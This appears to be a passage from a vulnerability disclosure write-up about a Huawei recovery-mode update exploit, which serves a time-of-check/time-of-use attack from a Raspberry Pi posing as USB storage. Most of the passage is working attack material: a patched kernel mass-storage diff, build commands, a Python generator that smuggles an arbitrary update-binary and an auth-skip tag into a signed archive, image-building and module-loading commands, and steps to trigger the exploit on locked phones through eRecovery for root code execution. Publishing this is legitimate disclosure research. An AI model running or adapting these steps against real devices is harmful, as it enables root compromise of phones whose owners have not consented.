+ _FSG_MODULE_PARAM_ARRAY(prefix, params, payload_offset, ullong, \
+ "Byte offset of the payload area"); \
+ _FSG_MODULE_PARAM_ARRAY(prefix, params, payload_size, ullong, \
+ "Byte size of the payload area"); \
_FSG_MODULE_PARAM(prefix, params, luns, uint, \
"number of LUNs"); \
_FSG_MODULE_PARAM(prefix, params, stall, bool, \
@@ -91,6 +108,12 @@ struct fsg_lun_config {
char cdrom;
char nofua;
char inquiry_string[INQUIRY_STRING_LEN];
+
+ /* ToC-ToU patch */
+ int trigger_counter;
+ loff_t trigger_offset;
+ loff_t payload_offset;
+ loff_t payload_size;
};
struct fsg_config {
diff --git a/drivers/usb/gadget/function/storage_common.h b/drivers/usb/gadget/function/storage_common.h
index bdeb1e233..84576bfcb 100644
--- a/drivers/usb/gadget/function/storage_common.h
+++ b/drivers/usb/gadget/function/storage_common.h
@@ -120,6 +120,12 @@ struct fsg_lun {
const char *name; /* "lun.name" */
const char **name_pfx; /* "function.name" */
char inquiry_string[INQUIRY_STRING_LEN];
+
+ /* ToC-ToU patch */
+ int trigger_counter;
+ loff_t trigger_offset;
+ loff_t payload_offset;
+ loff_t payload_size;
};
static inline bool fsg_lun_is_open(struct fsg_lun *curlun)
We’ve done the kernel compilation off-target, on an x86 Ubuntu 22.04 machine, so a cross compilation environment was needed.
Acquiring the kernel sources (we used the a90c1b9c
) and applying the mass storage patch:
sudo apt install git bc bison flex libssl-dev make libc6-dev libncurses5-dev
sudo apt install crossbuild-essential-arm64
mkdir linux
cd linux
git init
git remote add origin https://github.com/raspberrypi/linux
git fetch --depth 1 origin a90c1b9c7da585b818e677cbd8c0b083bed42c4d
git reset --hard FETCH_HEAD
git apply < ../mass_storage_patch.diff
For kernel config we use the Raspberry Pi 4 specific defconfig. The default kernel configuration contains a multitude of unnecessary modules, they could have been trimmed down quite a bit.
KERNEL=kernel8
make ARCH=arm64 CROSS_COMPILE=aarch64-linux-gnu- bcm2711_defconfig
make -j8 ARCH=arm64 CROSS_COMPILE=aarch64-linux-gnu- Image modules dtbs
After building the kernel, we copy the products to the SD card:
mount /dev/mmcblk0p1 /mnt/boot
mount /dev/mmcblk0p2 /mnt/root
mv /mnt/boot/kernel8.img /mnt/boot/kernel8-backup.img
mv /mnt/boot/overlays/ /mnt/boot/overlays_backup
mkdir /mnt/boot/overlays/
cp arch/arm64/boot/Image /mnt/boot/kernel8.img
cp arch/arm64/boot/dts/broadcom/*.dtb /mnt/boot/
cp arch/arm64/boot/dts/overlays/*.dtb* /mnt/boot/overlays/
cp arch/arm64/boot/dts/overlays/README /mnt/boot/overlays/
PATH=$PATH make ARCH=arm64 CROSS_COMPILE=aarch64-linux-gnu- INSTALL_MOD_PATH=/mnt/root modules_install
umount /dev/mmcblk0p1
umount /dev/mmcblk0p2
Finally we put the SD card back into the RPi and boot it.
Crafting the Update Archive
Recall that we have three phases of the update process separated by the mount actions: the first one checks software version for compatibility of the update with the device, the second verifies the update cryptographically, the third applies the update. We are going to construct a “frankenZIP” update archive which can presents itself in different ways throughout the update phases using our FaultyUSB to achieve our goal.
It may seem logical at first that in the first two steps (compatibility check, signature verification) we can use the same thing, since we just need a valid update archive that is both signed and has a matching version for the given device. However, the second phase of the update process is actually more convoluted as it performs multiple sub-checks: in addition to the Android-specific update signature verification, there is another important phase of the verification stage, which is the authentication token checking.
The authentication token is a cryptographically signed token, infeasible to forge, but it only applies to the OTA update archives, the SD-type updates are not checked for auth tokens. SD updates are most likely meant to be installed locally, e.g. literally from an SD-card, so there is no Huawei server to be involved in accepting the update process and issuing an auth-token.
It is possible to find an OTA update archive for a specific device, because the end user must be able to update their phone, so there must be a way to publicly access the OTA updates.
Unfortunately SD updates are more difficult to find, we only managed to find a few model-version combinations on Android file hosting sites.
Analyzing update archives of different types and versions we found that Huawei is using the so-called hotakey_v2
RSA key in broad ranges of devices as the Android-specific signing key: both an SD update for LIO EMUI 11 and the latest HarmonyOS updates for NOH are signed with this key.
This means that an update archive for a different model and older OS version may still pass the cryptographic verification successfully even on devices with a fresh HarmonyOS version.
Also, there are some recent changes in the update archive content: the newer update archives (both OTAs and SDs) have begun to utilize the packageinfo.mbn
version description file, which is also checked during in the verification stage.
If this file exists, a more thorough version-compatibility test is performed: e.g. when it defines an “Upgrade” field and the installed OS has a greater version number than the current update has, the update process is aborted.
However, the check is skipped if this file is missing – which is exactly the case with the pre-HarmonyOS updates, e.g. the EMUI 11 SD update archives don’t have the packageinfo.mbn
file.
Solving on all those constraints eventually we were able to find a publicly available file on a firmware sharing site (named Huawei Mate 30 Pro Lion-L29 hw eu LIO-L29 11.0.0.220(C432E7R8P4)_Firmware_EMUI11.0.0_05016HEY.zip
), which contains the SD update of LIO-L29 11.0.0.220 version.
There are three ZIP files in an SD update: base, preload, and cust package.
Each of them are signed.
We selected the cust package to be the foundation of the PoC, because of its tiny (14 KB) size.
This file is perfect for the second phase of the update (verification), but it would obviously not have the correct SOFTWARE_VER_LIST.mbn
for our target devices.
That’s why the exploit has to present the external media differently between phases 1 and 2 as well: first we will produce the variant that will have the desired SOFTWARE_VER_LIST.mbn
, but in the second phase we will produce the previously mentioned SD update archive file for EMUI 11, that passes not only signature verification, but also bypasses the authentication token and the packageinfo
requirement.
However, this original archive file is not used exactly “as-is” for phase two: we must make a change to it so that it still passes verification in phase two while also contains the arbitrary binary to be executed in the third phase (code execution).
Creating such a static “frankenZIP” that can produce multiple contents depending on update stage was the main point of our previous publication - see the UnZiploc presentation on exploiting CVE-2021-40045. The key to it is the way the parsing algorithm of the Android-specific signature footer works. The implementation still enables us to make a gap between the end of the actual ZIP file and the beginning of the whole-file PKCS#7 signature. This gap is a No man’s land in the sense that the ZIP parsers omit it, as it is technically part of the ZIP comment field; likewise the signature verifier also skips it, because the signature field is aligned to the end of the file. However (and this is why we needed a new vulnerability compared to the previous report) statically smuggling a ZIP file inside the gap area would no longer be possible, since the fix Huawei employed, i.e. searching for the ZIP End of Central Directory marker in the archive’s comment field, is an effective mitigation.
This EOCD searching happens in the verification phase, just before the Android-specific signature checking. This means that during the verification phase a pristine update archive must be used (apart from the fact that it is still possible to create a gap between the signature and the end of the ZIP data).
Therefore, the idea is to utilize the patched mass storage functionality of the Linux kernel to hide the injected ZIP inside the update archive exactly when the update process reaches the verification phase.
This is done by masking the payload area with zeros, so when a read-access occures at the end of the ZIP file during the EOCD searching phase of verification process, the phone will read zeros in the No man’s land and therefore the new fix will not cause an assertion.
However, reading the ZIP file in the third phase, the smuggled content will be provided and therefore (similarly to the previous vulnerability), the modified update-binary
will end up being executed.
The content of the crafted ZIP file can be restricted to a minimal file set, to only those which are essential to pass the sanity (META-INF/CERT.RSA
, SD_update.tag
) and version (SOFTWARE_VER_LIST.mbn
) checks during the update process.
Supported models depend on the content of the SOFTWARE_VER_LIST.mbn
file, where model codenames, geographical revision, and a minimally supported firmware version are listed.
The update-binary
contains the arbitrary code that will be executed.
Here is the ZIP-smuggling generator (smuggle_zip_inplace.py
), which takes a legitimate signed ZIP archive as a base and inject into it the previously discussed minimal file set and a custom binary to be executed.
import argparse
import struct
import zipfile
import io
import os
if __name__ == '__main__':
parser = argparse.ArgumentParser(description="poc update.zip repacker")
parser.add_argument("file", type=argparse.FileType("r+b"), help="update.zip file to be modified")
parser.add_argument("update_binary", type=argparse.FileType("rb"), help="update binary to be injected")
parser.add_argument("-g", "--gap", default="-1", help="gap between EOCD and signature (-1: maximum)")
parser.add_argument("-o", "--ofs", default="-1", help="payload offset in the gap")
args = parser.parse_args()
gap_size = int(args.gap, 0)
payload_ofs = int(args.ofs, 0)
args.file.seek(0, os.SEEK_END)
original_size = args.file.tell()
args.file.seek(-6, os.SEEK_END)
signature_size, magic, comment_size = struct.unpack("<HHH", args.file.read(6))
assert magic == 0xffff
print(f"comment size = {comment_size}")
print(f"signature size = {signature_size}")
# get the signature
args.file.seek(-signature_size, os.SEEK_END)
signature_data = args.file.read(signature_size - 6)
# prepare the gap to where the payload will be placed
# (gap is the new comment size - signature size)
if gap_size == -1:
gap_size = 0xffff - signature_size
assert gap_size + signature_size <= 0xffff
# automatically set the payload offset to be 0x1000-byte aligned
if payload_ofs == -1:
payload_ofs = (comment_size - original_size) & 0xfff
print(f"gap size = {gap_size}")
print(f"payload offset = {payload_ofs}")
# trucate the ZIP at the end of the signed data
args.file.seek(-(comment_size + 2), os.SEEK_END)
end_of_signed_data = args.file.tell()
args.file.truncate(end_of_signed_data)
# write the new (original ZIP's) EOCD according to the updated gap size
args.file.write(struct.pack("<H", gap_size + signature_size))
# gap before filling
args.file.write(b"\x00"*(payload_ofs))
# write a marker before the injected payload
args.file.write(b"=PAYLOAD-BEGIN=\x00")
# generate the injected ZIP payload
z = zipfile.ZipFile(args.file, "w", compression=zipfile.ZIP_DEFLATED)
# ensure the CERT.RSA has a proper length, the content is irrelevant
z.writestr("META-INF/CERT.RSA", b"A"*1300)
# the existence of this file make authentication tag verification skipped for OTA
z.writestr("skipauth_pkg.tag", b"")
# get the update binary to be executed
z.writestr("META-INF/com/google/android/update-binary", args.update_binary.read())
# some more files are necessary for an "SD update"
known_version_list = [
b"LIO-LGRP2-OVS 102.0.0.1",
b"LIO-LGRP2-OVS 11.0.0",
b"NOH-LGRP2-OVS 102.0.0.1",
b"NOH-LGRP2-OVS 11.0.0",
]
z.writestr("SOFTWARE_VER_LIST.mbn", b"\n".join(known_version_list)+b"\n")
z.writestr("SD_update.tag", b"SD_PACKAGE_BASEPKG\n")
z.close()
# write a marker after the injected payload
args.file.write(b"==PAYLOAD-END==\x00")
payload_size = args.file.tell() - (end_of_signed_data + 2) - payload_ofs
assert payload_size + payload_ofs < gap_size, f"{payload_size} + {payload_ofs} < {gap_size}"
# gap after filling
args.file.write(b"\x00"*(gap_size - payload_ofs - payload_size))
# signature
args.file.write(signature_data)
# footer
args.file.write(struct.pack("<HHH", signature_size, 0xffff, gap_size + signature_size))
Regarding the actual content of the PoCs: because a mass storage device has no immediate understanding on higher levels, like file system or even files, it can only operate on raw storage level, so the output of the PoCs should be in fact a raw file system image.
Here is below the file system image generation script, where the update_sd_base.zip
archive is the cust
part of the aformentioned LIO update and the update-binary-poc
the ELF executable to be run.
The update-binary-poc
is the static aarch64 ELF file, which finally gets execve
by the recovery, thus reaching arbitrary code execution as root.
Also note that the output image (file_system.img
) only contains a pure file system, and has no proper partition table.
python3 smuggle_zip_inplace.py update_sd_base.zip update-binary-poc
dd if=/dev/zero of=file_system.img bs=1M count=10
mkfs.exfat file_system.img
mkdir -p mnt
sudo mount -o loop,rw,nosuid,nodev,relatime,uid=1000,gid=1000,fmask=0022,dmask=0022,iocharset=utf8 -t exfat file_system.img mnt
mkdir -p mnt/dload
dd if=/dev/zero of=mnt/padding_between_exfat_headers_and_update_archive bs=1M count=1
sudo umount mnt
rmdir mnt
python -c 'd=open("file_system.img","rb").read();o=d.find("update_sd_base".encode("utf-16le"));b=d.find(b"=PAYLOAD-BEGIN=");e=d.find(b"==PAYLOAD-END==")+16;print(f"sudo rmmod g_mass_storage; sudo modprobe g_mass_storage file=/home/pi/file_system.img trigger_counter=4 trigger_offset=0x{o:x} payload_offset=0x{b:x} payload_size={e-b}")'
The file systems are tiny, just about 10 MB in size and formatted in exFAT. To have a proper offset-distance between the file system metadata (e.g. the file node descriptor) and the actual update archive, a 1 MB zero filled dummy file is inserted first. This is only a precaution to avoid the Linux kernel to cache the beginning of the update archive when it reads the file system metadata part.
The final step of the PoC build process automatically constructs a command which can be used to set the patched mass storage device parameters with the correct trigger and payload parameters.
The trigger condition is defined as a read event at file decriptor of the update_sd_base.zip
file, because the file path of the update archive must be resolved into a file node by file system, so the file metadata must be read before the actual file content.
Also the trigger counter parameter is empirically set as a constant based on the observed number of mount events, directory listings and file stats prior to the verification stage.
Leveraging Arbitrary Code Execution
Gaining root level code exec is nice and normally one would like to open a reverse shell to make use of it, but the recovery mode in which the update runs leaves us a very restricted environment in terms of external connections. However, as we already detailed in the UnZiploc presentation last year, the recovery mode by design can make use of WiFi to realize a “phone disaster recovery” feature, in which it download the OTA over internet directly from the recovery. So we could make use of the WiFi chip to connect to our AP and thus make the reverse shell possible. The exact PoC code is not disclosed here, it is left as an exercise for the reader :)
Running the PoC
After building the PoC the resulting file system image file is transferred to the Raspberry Pi and then loaded as the USB mass storage kernel module on the RPi, e.g.:
sudo rmmod g_mass_storage
sudo modprobe g_mass_storage \
file=/home/pi/file_system.img \
trigger_counter=4 trigger_offset=0x204042 \
payload_offset=0x308000 payload_size=3672
Then we connect the RPi with the target phone with the USB-C cable and simply trigger the update process. This can be done in different ways, depending on the lock state of the device.
If the phone is unlocked (i.e. you are trying to root your own phone :), once the phone recognizes the USB device, a notification appears and the file explorer now can list the content of our 10 MB emulated flash drive.
Then the dialer can be used to access the ProjectMenu application by dialing *#*#2846579#*#*
(or in case of a tablet use the calculator in landscape mode and write ()()2846579()()
), then select “4. Software Upgrade”, and then “1. Memory card Upgrade”.
More interestingly, if the phone credentials are not known, so the screen can’t be unlocked to access the ProjectMenu application, the SD update method is still reachable via the eRecovery menu, by powering the phone on while by pressing the Power and Volume Up buttons.
Because the trigger counter can be in an indefinite state after the normal mode Android read the external media, it is very important to execute the same kernel module unloader and loader command again while the phone reboots! This way the trigger counter is only affected by the update process, thus it works correctly.
The update process itself should be fairly quick, as the whole archive is just a few KBs, so the PoC code gets executed shortly, in a few seconds, after entering the recovery mode.
To close things out, here is a video capture of the exploit :)